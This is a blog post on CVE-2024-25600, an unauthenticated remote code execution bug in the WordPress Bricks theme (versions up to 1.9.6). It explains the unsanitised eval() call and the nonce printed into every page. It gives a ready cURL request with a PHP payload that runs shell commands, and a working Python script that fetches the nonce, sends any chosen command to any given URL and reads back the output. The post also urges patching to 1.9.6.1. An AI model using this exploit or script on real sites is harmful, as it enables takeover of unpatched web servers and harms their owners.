CVE-2024-25600 - WordPress - Bricks Theme - Unauthenticated RCE

I had totally missed this nasty bug when it came out earlier this year, and only became aware very recently after seeing this tweet on X. CVE-2024-25600 is an easy-to-exploit unauthenticated RCE that still affects installations of WordPress that have the Bricks Theme/Add-on installed with a version <= 1.9.6. I call it a theme since it's installed like a theme, but it's essentially an add-on to help make better posts and pages.

The vulnerability is an eval() call that accepts unsanitized attacker input: the `code` setting of a `code` element is evaluated server-side when a crafted JSON payload is sent to the /bricks/v1/render_element REST endpoint. The endpoint only checks a nonce, and that nonce is printed into the page source for every visitor, so no authentication is needed. If successfully exploited, the command runs on the web server and its output is reflected back as the message of an exception in the JSON response. For a far more detailed writeup, read the snicco post listed under Resources.

The exploitation steps are simple:

  • Locate an installation with Bricks running <= 1.9.6
  • Grab the nonce from the main page. It's easy to find with view source: search the inline JavaScript for `"nonce":` and copy the value.
  • Create a cURL request like the one below to the server, replacing [HOST] and [NONCE] with the correct values.
curl -k -X POST "http://[HOST]/index.php?rest_route=/bricks/v1/render_element" \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "code",
    "settings": {
      "executeCode": "true",
      "code": "<?php throw new Exception(`id`);?>"
    }
  }
}'
  • If successful, the response carries the command output inside the exception message, like this:

{"data":{"html":"Exception: uid=33(www-data) groups=33(www-data)\n"}}
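The same three steps as a small Python helper, added here as an example; it is not the original post's code nor Chocapikk's exploit. It mirrors the manual procedure above: pull the nonce out of the page source, build the render_element JSON body with the exception trick, and parse the command output back out of the `{"data":{"html":"Exception: ..."}}` response. The network part is isolated in `probe()`, so the parsing helpers can be exercised offline on the constructed sample page and response at the bottom (the `bricksData` JavaScript layout and the nonce value in that sample are assumptions for illustration, not captured from a real site).

```python
"""Check a WordPress site for CVE-2024-25600 (Bricks <= 1.9.6).

Added example, not the original post's or the exploit repo's code.
"""
import json
import re
import sys
import urllib.error
import urllib.request
from typing import Optional

# REST route targeted by the manual cURL request above.
ENDPOINT = "/index.php?rest_route=/bricks/v1/render_element"

# Bricks prints a REST nonce into the page's inline JavaScript; this regex
# finds it the same way the "view source" step does. Assumption: the page
# contains the literal text "nonce":"<value>".
NONCE_RE = re.compile(r'"nonce"\s*:\s*"(\w+)"')


def extract_nonce(html: str) -> Optional[str]:
    """Return the first nonce value found in a page's source, or None."""
    m = NONCE_RE.search(html)
    return m.group(1) if m else None


def build_payload(nonce: str, command: str, post_id: str = "1") -> dict:
    """Build the JSON body that makes Bricks eval() the embedded PHP.

    The PHP wraps the shell command (PHP backtick operator) in an Exception
    so that its output is reflected in the response. A command containing a
    backtick or a double quote would break the PHP string, so keep it simple.
    """
    return {
        "postId": post_id,
        "nonce": nonce,
        "element": {
            "name": "code",
            "settings": {
                "executeCode": "true",
                "code": f"<?php throw new Exception(`{command}`);?>",
            },
        },
    }


def parse_output(body: str) -> Optional[str]:
    """Return the reflected command output, or None if no execution is visible."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return None
    if not isinstance(data, dict) or not isinstance(data.get("data"), dict):
        return None
    html = data["data"].get("html", "")
    if not isinstance(html, str) or not html.startswith("Exception: "):
        return None
    return html[len("Exception: "):].strip()


def probe(base_url: str, command: str = "id", timeout: int = 10) -> Optional[str]:
    """Fetch the front page for the nonce, send the payload, return the output."""
    base = base_url.rstrip("/")
    with urllib.request.urlopen(base + "/", timeout=timeout) as resp:
        nonce = extract_nonce(resp.read().decode("utf-8", "replace"))
    if nonce is None:
        return None
    req = urllib.request.Request(
        base + ENDPOINT,
        data=json.dumps(build_payload(nonce, command)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        # A 4xx/5xx still carries the JSON body Bricks produced.
        body = e.read().decode("utf-8", "replace")
    return parse_output(body)


# Constructed sample data (not captured from a real site) for offline use.
SAMPLE_HTML = (
    '<script>var bricksData = {"ajaxUrl":"/wp-admin/admin-ajax.php",'
    '"nonce":"9c5c4c0f2a"};</script>'
)
SAMPLE_RESPONSE = '{"data":{"html":"Exception: uid=33(www-data) groups=33(www-data)\\n"}}'

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"offline demo: nonce={extract_nonce(SAMPLE_HTML)} "
              f"output={parse_output(SAMPLE_RESPONSE)!r}")
    else:
        out = probe(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "id")
        print(f"vulnerable, output: {out}" if out else "no code execution observed")
```

Run it with no arguments to see the parsing on the sample data, or `python3 check.py http://[HOST] id` against a lab instance you own. Treat a `None` result as inconclusive rather than as proof of a patched site: it also appears when the nonce could not be found or the element rendered without reflecting the exception.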

There was a small hiccup for me and this was finding the correct payload. The Chocapikk repo for this exploit provides 4 different payloads, mine happened to be the fourth, so it may require a few attempts to get this working.

Below is a video showing the exploit against an environment I setup for testing this:

A very nasty vulnerability. If you're affected, update Bricks to 1.9.6.1 or later ASAP: the issue is already flagged by most common vulnerability scanners, so attackers will find vulnerable sites just as easily as you can.

Resources used:

GitHub - Chocapikk/CVE-2024-25600: Unauthenticated Remote Code Execution – Bricks <= 1.9.6 (exploit repository with the four payload variants)
snicco: Unauthenticated Remote Code Execution – Bricks <= 1.9.6 (in-depth writeup)
Vulnerability record for Bricks Builder: commercial plugin, ~25,000 active installs, vulnerable version <= 1.9.6, audited version 1.9.6, fully patched version 1.9.6.1